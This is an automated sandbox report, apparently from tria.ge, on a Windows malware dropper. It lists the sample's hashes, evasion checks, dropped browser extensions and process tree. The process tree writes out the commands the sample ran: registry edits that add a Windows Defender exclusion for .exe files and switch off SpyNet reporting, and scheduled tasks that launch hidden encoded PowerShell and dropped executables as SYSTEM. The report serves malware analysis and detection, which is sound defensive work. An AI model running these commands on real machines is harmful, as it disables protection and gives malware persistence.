Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
124s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
29/10/2022, 06:58
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
1747dafa2b2b2b16244925f00d37eaeb
-
SHA1
1db1a2b0293a16beb65b65d02401842f82aca174
-
SHA256
e23ad43ad1730cb25b11f18add7b738c59ecbbe9ce1006e7847d5b965fb9ef72
-
SHA512
1e01b49098108e779fd7e499c54837c95b6d40f53a01a5157700a6a1658afc7144867704a001cb5dc878b4e1b1359731c5e67f6551b69d014811399ca4d86d43
-
SSDEEP
196608:91OdN9lsVpHxcSdgggP2/SOcb8D07AvXhkvUbfv+UVJmQrI:3OVlspHX9/SOU8w7Avxkev+oMQrI
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 62 1504 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 4980 Install.exe 2336 Install.exe 3148 KxUoLgv.exe 3084 aWlYVTM.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation aWlYVTM.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Install.exe -
Loads dropped DLL 1 IoCs
pid Process 1504 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json aWlYVTM.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json aWlYVTM.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini aWlYVTM.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 aWlYVTM.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol KxUoLgv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 aWlYVTM.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 aWlYVTM.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 aWlYVTM.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA aWlYVTM.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini KxUoLgv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE aWlYVTM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA aWlYVTM.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak aWlYVTM.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi aWlYVTM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi aWlYVTM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja aWlYVTM.exe File created C:\Program Files (x86)\fpJTwAuoAMgU2\pGIskHUGPXVxE.dll aWlYVTM.exe File created C:\Program Files (x86)\XSxxgBHfieTOC\MgjUhKF.dll aWlYVTM.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak aWlYVTM.exe File created C:\Program Files (x86)\qwQKalOeU\OjrPxrK.xml aWlYVTM.exe File created C:\Program Files (x86)\XSxxgBHfieTOC\UFUTvPX.xml aWlYVTM.exe File created C:\Program Files (x86)\DTVeiSnVEyUn\WPSJCjR.dll aWlYVTM.exe File created C:\Program Files (x86)\qwQKalOeU\GsHGXx.dll aWlYVTM.exe File created C:\Program Files (x86)\fpJTwAuoAMgU2\lPVgfKz.xml aWlYVTM.exe File created C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR\NkJKfWc.dll aWlYVTM.exe File created C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR\EdvjbaO.xml aWlYVTM.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bVdqBxoxNAgpdKrXAY.job schtasks.exe File created C:\Windows\Tasks\PuhPMVgEjGGxLrdgk.job schtasks.exe File created C:\Windows\Tasks\vzgcUMxkKavOBeV.job schtasks.exe File created C:\Windows\Tasks\KhizVdtuvcIJGwZop.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3208 schtasks.exe 3028 schtasks.exe 5044 schtasks.exe 4516 schtasks.exe 4076 schtasks.exe 4868 schtasks.exe 2508 schtasks.exe 4636 schtasks.exe 2452 schtasks.exe 4632 schtasks.exe 2996 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer aWlYVTM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\MaxCapacity = "15140" aWlYVTM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ aWlYVTM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" aWlYVTM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket aWlYVTM.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" aWlYVTM.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "0" aWlYVTM.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" aWlYVTM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume aWlYVTM.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 1132 powershell.EXE 1132 powershell.EXE 3500 powershell.exe 3500 powershell.exe 4860 powershell.exe 4860 powershell.exe 3564 powershell.EXE 3564 powershell.EXE 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe 3084 aWlYVTM.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1132 powershell.EXE Token: SeDebugPrivilege 3500 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeDebugPrivilege 3564 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4100 wrote to memory of 4980 4100 file.exe 82 PID 4100 wrote to memory of 4980 4100 file.exe 82 PID 4100 wrote to memory of 4980 4100 file.exe 82 PID 4980 wrote to memory of 2336 4980 Install.exe 83 PID 4980 wrote to memory of 2336 4980 Install.exe 83 PID 4980 wrote to memory of 2336 4980 Install.exe 83 PID 2336 wrote to memory of 396 2336 Install.exe 84 PID 2336 wrote to memory of 396 2336 Install.exe 84 PID 2336 wrote to memory of 396 2336 Install.exe 84 PID 2336 wrote to memory of 2484 2336 Install.exe 86 PID 2336 wrote to memory of 2484 2336 Install.exe 86 PID 2336 wrote to memory of 2484 2336 Install.exe 86 PID 396 wrote to memory of 1868 396 forfiles.exe 88 PID 396 wrote to memory of 1868 396 forfiles.exe 88 PID 396 wrote to memory of 1868 396 forfiles.exe 88 PID 2484 wrote to memory of 2144 2484 forfiles.exe 89 PID 2484 wrote to memory of 2144 2484 forfiles.exe 89 PID 2484 wrote to memory of 2144 2484 forfiles.exe 89 PID 1868 wrote to memory of 3736 1868 cmd.exe 91 PID 1868 wrote to memory of 3736 1868 cmd.exe 91 PID 1868 wrote to memory of 3736 1868 cmd.exe 91 PID 2144 wrote to memory of 3680 2144 cmd.exe 90 PID 2144 wrote to memory of 3680 2144 cmd.exe 90 PID 2144 wrote to memory of 3680 2144 cmd.exe 90 PID 1868 wrote to memory of 952 1868 cmd.exe 92 PID 1868 wrote to memory of 952 1868 cmd.exe 92 PID 1868 wrote to memory of 952 1868 cmd.exe 92 PID 2144 wrote to memory of 4512 2144 cmd.exe 93 PID 2144 wrote to memory of 4512 2144 cmd.exe 93 PID 2144 wrote to memory of 4512 2144 cmd.exe 93 PID 2336 wrote to memory of 4632 2336 Install.exe 94 PID 2336 wrote to memory of 4632 2336 Install.exe 94 PID 2336 wrote to memory of 4632 2336 Install.exe 94 PID 2336 wrote to memory of 228 2336 Install.exe 96 PID 2336 wrote to memory of 228 2336 Install.exe 96 PID 2336 wrote to memory of 228 2336 Install.exe 96 PID 1132 wrote to memory of 3836 1132 powershell.EXE 100 PID 1132 wrote to memory of 3836 1132 powershell.EXE 100 PID 2336 wrote to memory of 3164 2336 Install.exe 111 PID 2336 wrote to memory of 3164 2336 Install.exe 111 PID 2336 wrote to memory of 3164 2336 Install.exe 111 PID 2336 wrote to memory of 2996 2336 Install.exe 113 PID 2336 wrote to memory of 2996 2336 Install.exe 113 PID 2336 wrote to memory of 2996 2336 Install.exe 113 PID 3148 wrote to memory of 3500 3148 KxUoLgv.exe 117 PID 3148 wrote to memory of 3500 3148 KxUoLgv.exe 117 PID 3148 wrote to memory of 3500 3148 KxUoLgv.exe 117 PID 3500 wrote to memory of 4464 3500 powershell.exe 119 PID 3500 wrote to memory of 4464 3500 powershell.exe 119 PID 3500 wrote to memory of 4464 3500 powershell.exe 119 PID 4464 wrote to memory of 3976 4464 cmd.exe 120 PID 4464 wrote to memory of 3976 4464 cmd.exe 120 PID 4464 wrote to memory of 3976 4464 cmd.exe 120 PID 3500 wrote to memory of 3084 3500 powershell.exe 121 PID 3500 wrote to memory of 3084 3500 powershell.exe 121 PID 3500 wrote to memory of 3084 3500 powershell.exe 121 PID 3500 wrote to memory of 5048 3500 powershell.exe 122 PID 3500 wrote to memory of 5048 3500 powershell.exe 122 PID 3500 wrote to memory of 5048 3500 powershell.exe 122 PID 3500 wrote to memory of 4988 3500 powershell.exe 123 PID 3500 wrote to memory of 4988 3500 powershell.exe 123 PID 3500 wrote to memory of 4988 3500 powershell.exe 123 PID 3500 wrote to memory of 2424 3500 powershell.exe 124 PID 3500 wrote to memory of 2424 3500 powershell.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Users\Admin\AppData\Local\Temp\7zSBF6D.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Users\Admin\AppData\Local\Temp\7zSC345.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:3736
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:952
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3680
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4512
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRNfnhKhF" /SC once /ST 04:47:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRNfnhKhF"4⤵PID:228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRNfnhKhF"4⤵PID:3164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bVdqBxoxNAgpdKrXAY" /SC once /ST 07:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\LFqhtLxKdKUjncZ\KxUoLgv.exe\" Pu /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2996
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3836
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4364
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4264
-
C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\LFqhtLxKdKUjncZ\KxUoLgv.exeC:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\LFqhtLxKdKUjncZ\KxUoLgv.exe Pu /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3148 -
